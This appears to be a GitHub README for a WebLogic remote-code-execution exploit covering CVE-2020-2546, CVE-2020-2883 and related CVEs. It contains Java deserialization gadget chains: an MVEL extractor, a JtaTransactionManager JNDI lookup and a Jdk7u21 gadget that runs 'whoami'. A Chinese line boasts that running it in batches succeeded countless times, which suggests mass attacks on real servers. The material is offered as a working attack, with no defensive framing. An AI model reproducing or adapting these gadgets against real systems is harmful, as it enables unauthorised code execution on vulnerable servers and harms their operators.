Home

Awesome

Twitter: @Hktalent3135773 Tweet Follow on Twitter

1、Weblogic RCE exploit

CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3 payload exploit poc python3

2、exploit

2.1、rmi server,see

3、code

3.1、code1

MVEL.compileExpression
MvelExtractor o = new MvelExtractor("xxx;");
		ObjectOutputStream oo = new ObjectOutputStream(System.out); 
		oo.writeObject(o);
		oo.flush();

3.2、code2

public MsgOutput getObject(final String command) throws Exception {
	  String jndiAddress = command;
		JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
		jtaTransactionManager.setUserTransactionName(jndiAddress);
		MsgOutput remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", jtaTransactionManager), MsgOutput.class);
    return remote;
  }

3.3、code3

public IORDelegate getObject(final String command) throws Exception {
IORDelegate ior = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", new Jdk7u21().getObject("whoami")), IORDelegate.class);
    return ior;
  }

3.4、code4

weblogic.iiop.IIOPRemoteRefd,ObjectMessageImpl

3.5、CVE-2020-2883 code

https://github.com/hktalent/CVE_2020_2546/issues/4

2883

<img width="837" alt="image" src="https://user-images.githubusercontent.com/18223385/84259459-16b3cb00-ab4b-11ea-8422-ea7d42365895.png">

4、CVE-2020-2546 payload

批量一波,成功无数

<img width="815" alt="image" src="https://user-images.githubusercontent.com/18223385/80388926-0cac7480-88dd-11ea-9531-cadcc688c8a3.png"> <img width="621" alt="image" src="https://user-images.githubusercontent.com/18223385/75693161-8c550300-5ce1-11ea-9c28-3e81a6c72d28.png">

5、thanks for

@r4v3zn @0nise